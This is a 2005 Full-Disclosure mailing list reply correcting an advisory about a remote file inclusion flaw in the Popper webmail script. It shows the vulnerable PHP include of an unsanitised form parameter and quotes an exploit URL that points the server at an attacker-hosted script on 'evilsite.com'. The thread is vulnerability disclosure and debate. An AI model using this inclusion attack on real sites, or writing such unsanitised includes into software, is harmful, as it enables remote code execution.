[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Re: LSS.hr false positives. (correction)
From:       Leon Juranic <ljuranic () lss ! hr>
Date:       2005-06-05 23:23:57
Message-ID: 20050605232357.CC5BC42F3D () maja ! zesoi ! fer ! hr
[Download RAW message or body]


Hi b0iler,


There is a problem with original advisory on security.lss.hr site.  Vulnerable 
PHP line itself is presented as HTML tag so it isn't visible within browser. 
That's why the rest of the advisory doesn't make any sense.

Here it is:
--------------
..
<?php
		if(file_exists($form.".toolbar.inc.php")) {
			include($form.".toolbar.inc.php");
		}
?>
..
..
<?php include($form.".form.inc.php");?>    <- HERE IT IS
..
--------------


I apologize for that mistake, we will fix that in a few hours. 



> b0iler[at]r00thell.org:
>
>>Popper is vulnerable to remote code inclusion bug in childwindow.inc.php script that can be
>>abused to execute arbitrary code.
>>Vulnerable code in childwindow.inc.php:
>>
>>-----
>>...
>>    if(file_exists($form.".toolbar.inc.php")) {
>>        include($form.".toolbar.inc.php");
>>    }
>>?>
>
>file_exists() only work on local files, not even with allow_url_fopen on does it work.  Even
>if the file_exists() check was not there your discription of how to exploit it is incorrect:
>
>>To exploit this vulnerability, attacker has to put script like test.form.inc.php on
>>www.evilsite.com HTTP server, and call url like this:
>>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test
>
>they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  It's quite
>obvious you did not even bother testing this before issuing the advisory.
>


Regards,
---------------------------------------
Leon Juranic, LSS Security 
http://security.lss.hr 

"Born under the lucky star magical, 
but on this world generally tragical". 
                                - Djole 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic